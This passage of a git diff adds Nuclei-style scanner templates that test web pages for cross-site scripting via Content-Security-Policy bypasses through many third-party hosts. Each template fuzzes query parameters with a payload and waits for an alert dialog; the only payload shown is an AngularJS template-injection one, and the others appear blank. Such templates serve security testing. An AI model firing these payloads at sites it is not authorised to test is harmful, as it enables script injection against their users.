foo
{{ [1].reduce(value.alert, 1); }}
foo
{{ [1].reduce(value.alert, 1); }}
'
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: st3_zoom_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "st3_zoom_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/stackexchange-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/stackexchange-api-csp-xss.yaml
new file mode 100644
index 00000000000..805ef3c0e34
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/stackexchange-api-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: stackexchange-api-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via StackExchange API
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,stackexchange
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: stackexchange_api_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "stackexchange_api_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/static-parastorage-csp-xss.yaml b/dast/vulnerabilities/xss/csp/static-parastorage-csp-xss.yaml
new file mode 100644
index 00000000000..8a0729fae8d
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/static-parastorage-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: static-parastorage-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Parastorage Static
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,parastorage
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: static_parastorage_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "static_parastorage_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/storage-googleapis-csp-xss.yaml b/dast/vulnerabilities/xss/csp/storage-googleapis-csp-xss.yaml
new file mode 100644
index 00000000000..7f9571d8376
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/storage-googleapis-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: storage-googleapis-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Google Storage
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,google
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: storage_googleapis_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "storage_googleapis_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/storemapper-herokuapp-fastly-csp-xss.yaml b/dast/vulnerabilities/xss/csp/storemapper-herokuapp-fastly-csp-xss.yaml
new file mode 100644
index 00000000000..32994ba3d9c
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/storemapper-herokuapp-fastly-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: storemapper-herokuapp-fastly-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Storemapper Herokuapp Fastly
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,storemapper
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: storemapper_herokuapp_fastly_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "storemapper_herokuapp_fastly_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/suggest-taobao-csp-xss.yaml b/dast/vulnerabilities/xss/csp/suggest-taobao-csp-xss.yaml
new file mode 100644
index 00000000000..cf1e7e98928
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/suggest-taobao-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: suggest-taobao-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Taobao Suggest
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,taobao
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: suggest_taobao_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "suggest_taobao_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/suggestqueries-youtube-csp-xss.yaml b/dast/vulnerabilities/xss/csp/suggestqueries-youtube-csp-xss.yaml
new file mode 100644
index 00000000000..fa2828d7c4e
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/suggestqueries-youtube-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: suggestqueries-youtube-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via YouTube SuggestQueries
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,youtube
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: suggestqueries_youtube_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "suggestqueries_youtube_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/support-zendesk-csp-xss.yaml b/dast/vulnerabilities/xss/csp/support-zendesk-csp-xss.yaml
new file mode 100644
index 00000000000..6e2c9946b9a
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/support-zendesk-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: support-zendesk-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Zendesk Support
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,zendesk
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: support_zendesk_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "support_zendesk_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/swiftype-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/swiftype-api-csp-xss.yaml
new file mode 100644
index 00000000000..85452b5d1d9
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/swiftype-api-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: swiftype-api-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Swiftype API
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,swiftype
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: swiftype_api_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "swiftype_api_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/sync-im-apps-csp-xss.yaml b/dast/vulnerabilities/xss/csp/sync-im-apps-csp-xss.yaml
new file mode 100644
index 00000000000..9d3615ae106
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/sync-im-apps-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: sync-im-apps-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via IM Apps Sync
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,im-apps
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: sync_im_apps_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "sync_im_apps_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/tagmanager-google-csp-xss.yaml b/dast/vulnerabilities/xss/csp/tagmanager-google-csp-xss.yaml
new file mode 100644
index 00000000000..60413f9387e
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/tagmanager-google-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: tagmanager-google-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Google Tag Manager
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,google
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: tagmanager_google_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "tagmanager_google_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/tcr9i-openai-csp-xss.yaml b/dast/vulnerabilities/xss/csp/tcr9i-openai-csp-xss.yaml
new file mode 100644
index 00000000000..1cd217b9730
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/tcr9i-openai-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: tcr9i-openai-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via OpenAI TCR9I
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,openai
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: tcr9i_openai_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "tcr9i_openai_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/thehive-shopify-csp-xss.yaml b/dast/vulnerabilities/xss/csp/thehive-shopify-csp-xss.yaml
new file mode 100644
index 00000000000..7b8db0afe94
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/thehive-shopify-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: thehive-shopify-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Shopify TheHive
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,shopify
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - '
'
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: thehive_shopify_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "thehive_shopify_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/thiscanbeanything-zendesk-csp-xss.yaml b/dast/vulnerabilities/xss/csp/thiscanbeanything-zendesk-csp-xss.yaml
new file mode 100644
index 00000000000..41371386464
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/thiscanbeanything-zendesk-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: thiscanbeanything-zendesk-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Zendesk ThisCanBeAnything
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,zendesk
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: thiscanbeanything_zendesk_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "thiscanbeanything_zendesk_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/tiktok-analytics-csp-xss.yaml b/dast/vulnerabilities/xss/csp/tiktok-analytics-csp-xss.yaml
new file mode 100644
index 00000000000..762cd7ef3e9
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/tiktok-analytics-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: tiktok-analytics-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via TikTok Analytics
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,tiktok
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: tiktok_analytics_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "tiktok_analytics_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/translate-google-csp-xss.yaml b/dast/vulnerabilities/xss/csp/translate-google-csp-xss.yaml
new file mode 100644
index 00000000000..ac99d5c7d23
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/translate-google-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: translate-google-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Google Translate
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,google
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: translate_google_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "translate_google_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/translate-googleapis-csp-xss.yaml b/dast/vulnerabilities/xss/csp/translate-googleapis-csp-xss.yaml
new file mode 100644
index 00000000000..d4ba9d4fe9b
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/translate-googleapis-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: translate-googleapis-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Google Translate API
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,google
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: translate_googleapis_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "translate_googleapis_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/translate-yandex-csp-xss.yaml b/dast/vulnerabilities/xss/csp/translate-yandex-csp-xss.yaml
new file mode 100644
index 00000000000..881620169ca
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/translate-yandex-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: translate-yandex-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Yandex Translate
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,yandex
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: translate_yandex_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "translate_yandex_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/tumblr-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/tumblr-api-csp-xss.yaml
new file mode 100644
index 00000000000..f0df4772dde
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/tumblr-api-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: tumblr-api-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Tumblr API
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,tumblr
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: tumblr_api_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "tumblr_api_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/twitter-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/twitter-api-csp-xss.yaml
new file mode 100644
index 00000000000..baa6e590235
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/twitter-api-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: twitter-api-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Twitter API
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,twitter
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: twitter_api_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "twitter_api_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/twitter-csp-xss.yaml b/dast/vulnerabilities/xss/csp/twitter-csp-xss.yaml
new file mode 100644
index 00000000000..fdfb51dce12
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/twitter-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: twitter-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Twitter
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,twitter
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: twitter_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "twitter_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/udgnoz7mccyaowzp-public-blob-vercel-storage-csp-xss.yaml b/dast/vulnerabilities/xss/csp/udgnoz7mccyaowzp-public-blob-vercel-storage-csp-xss.yaml
new file mode 100644
index 00000000000..5ae7610a7bb
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/udgnoz7mccyaowzp-public-blob-vercel-storage-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: udgnoz7mccyaowzp-public-blob-vercel-storage-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Vercel Storage
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,vercel
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: udgnoz7mccyaowzp_public_blob_vercel_storage_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "udgnoz7mccyaowzp_public_blob_vercel_storage_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/ug-alibaba-csp-xss.yaml b/dast/vulnerabilities/xss/csp/ug-alibaba-csp-xss.yaml
new file mode 100644
index 00000000000..93d14b06a8d
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/ug-alibaba-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: ug-alibaba-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Alibaba
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
